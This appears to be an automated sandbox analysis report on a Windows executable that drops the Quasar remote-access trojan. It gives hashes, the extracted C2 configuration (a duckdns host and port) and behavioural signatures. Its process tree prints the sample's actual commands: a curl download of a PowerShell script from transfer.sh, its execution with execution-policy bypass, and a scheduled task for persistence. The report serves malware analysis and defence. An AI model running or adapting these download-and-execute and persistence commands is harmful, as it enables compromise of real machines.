Analysis
-
max time kernel
143s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
17/01/2023, 08:26
Static task
static1
Behavioral task
behavioral1
Sample
{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe
Resource
win10v2004-20221111-en
General
-
Target
{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe
-
Size
547KB
-
MD5
b0ab211e83a23d58e1322e4d2d6f0a96
-
SHA1
d568fbcd41e30651cc80ba8a5e9eeab637a99f9e
-
SHA256
3459ebc48502fb42337647d456681337d303e50a99ca536e010d7cf1ebf6f0f5
-
SHA512
4a54251fbf23fe3d0e96fcf8d3363e917921644a178387b619367338faa1884134639dd696d55a5a9f06cf167f128d599cc57fb62dba603afc4ebb287d22204d
-
SSDEEP
3072:SvGyYiSDnt1G5GWp1icKAArDZz4N9GhbkrNEk184:W4wp0yN90QEg
Malware Config
Extracted
quasar
1.4.0
Office04
ghcc.duckdns.org:4782
a9c03eb7-f3c1-4b9e-a4f7-1962d17a793b
-
encryption_key
B0326395AC2D48856CAE22978A087DF5DCF5816D
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Update
-
subdirectory
SubDir
Signatures
-
Quasar payload 2 IoCs
resource yara_rule behavioral2/memory/2880-144-0x0000000000400000-0x0000000000484000-memory.dmp family_quasar behavioral2/memory/2880-145-0x000000000047E74E-mapping.dmp family_quasar -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 21 api.ipify.org 22 api.ipify.org -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3572 set thread context of 2880 3572 powershell.exe 93 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1952 schtasks.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings cmd.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3572 powershell.exe 3572 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3572 powershell.exe Token: SeDebugPrivilege 2880 RegAsm.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2880 RegAsm.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 4644 wrote to memory of 4112 4644 {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe 82 PID 4644 wrote to memory of 4112 4644 {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe 82 PID 4112 wrote to memory of 3752 4112 cmd.exe 84 PID 4112 wrote to memory of 3752 4112 cmd.exe 84 PID 3752 wrote to memory of 2132 3752 WScript.exe 85 PID 3752 wrote to memory of 2132 3752 WScript.exe 85 PID 2132 wrote to memory of 4320 2132 cmd.exe 87 PID 2132 wrote to memory of 4320 2132 cmd.exe 87 PID 4320 wrote to memory of 1852 4320 cmd.exe 88 PID 4320 wrote to memory of 1852 4320 cmd.exe 88 PID 3752 wrote to memory of 364 3752 WScript.exe 89 PID 3752 wrote to memory of 364 3752 WScript.exe 89 PID 364 wrote to memory of 632 364 cmd.exe 91 PID 364 wrote to memory of 632 364 cmd.exe 91 PID 632 wrote to memory of 3572 632 cmd.exe 92 PID 632 wrote to memory of 3572 632 cmd.exe 92 PID 3572 wrote to memory of 2880 3572 powershell.exe 93 PID 3572 wrote to memory of 2880 3572 powershell.exe 93 PID 3572 wrote to memory of 2880 3572 powershell.exe 93 PID 3572 wrote to memory of 2880 3572 powershell.exe 93 PID 3572 wrote to memory of 2880 3572 powershell.exe 93 PID 3572 wrote to memory of 2880 3572 powershell.exe 93 PID 3572 wrote to memory of 2880 3572 powershell.exe 93 PID 3572 wrote to memory of 2880 3572 powershell.exe 93 PID 2880 wrote to memory of 1952 2880 RegAsm.exe 95 PID 2880 wrote to memory of 1952 2880 RegAsm.exe 95 PID 2880 wrote to memory of 1952 2880 RegAsm.exe 95
Processes
-
C:\Users\Admin\AppData\Local\Temp\{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe"C:\Users\Admin\AppData\Local\Temp\{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4644 -
C:\Windows\SYSTEM32\cmd.execmd /c new.vbs2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4112 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\new.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3752 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps14⤵
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\system32\cmd.execmd.exe /c curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps15⤵
- Suspicious use of WriteProcessMemory
PID:4320 -
C:\Windows\system32\curl.execurl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps16⤵PID:1852
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps14⤵
- Suspicious use of WriteProcessMemory
PID:364 -
C:\Windows\system32\cmd.execmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps15⤵
- Suspicious use of WriteProcessMemory
PID:632 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps16⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3572 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"7⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Update" /sc ONLOGON /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" /rl HIGHEST /f8⤵
- Creates scheduled task(s)
PID:1952
-
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
300.0MB
MD5f7e7099eea0cc25fc49d04cd53c573a1
SHA13abac9f3f93b0f87ef432d70c40e8ab865157770
SHA256b7f331e83a80b15cc4537324bde827ac9b2ecb990150db4d00d84ee2560cf5be
SHA512c19ddc5e41ed6d485f5df47996f34ff326a782e909bffaa8aa31a3f72fddb33cc7e3709e0cc44b2078668dc83297b42bb3157d6d000a9323ffca6303cd43f074
-
Filesize
5.1MB
MD5970aca768e68faa580f758a1a379686b
SHA16a93921485cbd83382eb5a47315b1f0a67bcf684
SHA2566c1e62385d660ca43e024d461154fbb4805e429cdf7850d19510d7f69533739e
SHA51266dd4c5b17978e68c8e0cd2bc4fd35ba5d519447ff34259ec77d11e4253cbfc9955a43915ed3c343f41dc04d97f4302ab6922a823b0e0da44e8893d29ec7cf0f